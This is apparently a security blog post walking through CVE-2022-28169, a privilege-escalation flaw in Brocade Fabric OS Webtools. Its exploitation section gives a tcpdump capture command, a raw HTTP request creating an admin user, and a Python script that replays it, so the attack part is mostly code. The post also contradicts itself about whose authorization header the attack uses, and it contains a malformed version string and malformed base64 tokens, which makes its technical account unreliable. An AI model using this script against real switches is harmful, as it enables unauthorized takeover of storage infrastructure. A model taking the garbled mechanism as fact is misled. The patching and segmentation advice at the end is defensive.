Brocade Fabric OS runs the Fiber Channel switches used in storage networks everywhere, from data centers to cloud platforms. Security is crucial to keep data safe in those environments. In this post, we will break down CVE-2022-28169, a vulnerability that affects Brocade Webtools—a web-based management utility found in many Brocade switches. We'll explain how it works, how it can be exploited, and what you should do to stay protected.

Overview of CVE-2022-28169

Affected Software:
Brocade Fabric OS versions *before* v9.1.1, v9..1e, and v8.2.3c.

What’s the Issue?
A standard (not admin) Webtools user can gain admin-level rights. Basically, someone with low privileges can create a new admin user—something only actual admins should be allowed to do.

Key Vulnerability:
Authorization headers sent in HTTP requests are reused and not checked properly. A non-admin (like an “operator”) can capture and use an admin’s session token to elevate privileges, especially since earlier versions don’t encrypt these headers by default.

Step-By-Step Exploitation

Let’s walk through how this can be used in a real attack. This is for educational purposes only—do not attempt this on any system you do not own.

1. Intercepting Web Session Traffic

Brocade Webtools communicates over HTTP. If HTTPS isn’t properly set or is misconfigured, the session info (Authorization Header) is sent in clear text.

An attacker with network access can capture network traffic—using tools like Wireshark or mitmproxy.

# Using tcpdump to capture web session:
sudo tcpdump -i eth port 80 -w brocade-session.pcap

2. Grabbing Authorization Tokens

The attacker captures HTTP requests from both an admin and a non-admin (operator) session. Inside these, there are Authorization headers which look like this:

Authorization: Basic YWRtaW46cGFzc3dvcmQ=

(A base64 encoded <username>:<password> string.)

3. Replaying or Reusing Authorization Header

Normally, even if an operator is authenticated, trying to create a new user via the Webtools interface (or by sending a POST request to /rest/users) should fail—only admins have access.

But, if the attacker takes the request generated by a normal user and replaces their own Authorization header with a captured operator’s header, Brocade Webtools fails to enforce proper role restrictions and *grants* their request.

Here’s a sample intercepted operator’s request to create a new user

POST /rest/users HTTP/1.1
Host: brocade-switch-ip
Authorization: Basic b3BlcmFb3I6b3BlcmFb3JwYXNz
Content-Type: application/json

{
  "username": "newsuperadmin",
  "password": "mySecur3Pass!",
  "roles": ["admin"]
}

If this Authorization header belongs to an operator (not an admin), the request still works in vulnerable versions!

4. Result: New Admin User

With the exploit, the attacker successfully creates a new top-level admin user, escalating privileges and effectively gaining full control.

Here’s an example (for demo only!) in Python to replay such a request

import requests

url = 'http://brocade-switch-ip/rest/users';

headers = {
  'Authorization': 'Basic b3BlcmFb3I6b3BlcmFb3JwYXNz',  # Replace with operator base64 credentials
  'Content-Type': 'application/json'
}

data = {
  'username': 'hackeradmin',
  'password': 'Sup3rSecret123',
  'roles': ['admin']
}

response = requests.post(url, json=data, headers=headers)
print(response.status_code)
print(response.text)

Why Does This Happen?

Brocade’s backend trusts any valid Authorization header and doesn’t double-check user privileges at the business logic level. This allows role abuse. Also, legacy Brocade OS versions may not enforce HTTPS, making it trivial to intercept credentials.

Brocade’s original security advisory:

Broadcom Security Advisory SA18861

CVE details:

NIST NVD CVE-2022-28169

Conclusion

CVE-2022-28169 shows how dangerous web management misconfigurations can be—especially in enterprise storage environments. Small mistakes, like failing to enforce strict privilege checks or not encrypting traffic, can grant attackers total control. Always keep your firmware up to date, segment your networks, and keep a close eye on who has admin rights.

Stay safe, and patch your switches!

*If you found this article useful, feel free to share! Questions or advice needed? Leave a comment below.*


Further Reading:
- Using Wireshark to Capture Web Authentication
- How HTTP Basic Authentication Works
- Brocade Fabric OS Documentation

Timeline

Published on: 10/25/2022 21:15:00 UTC
Last modified on: 03/02/2023 16:05:00 UTC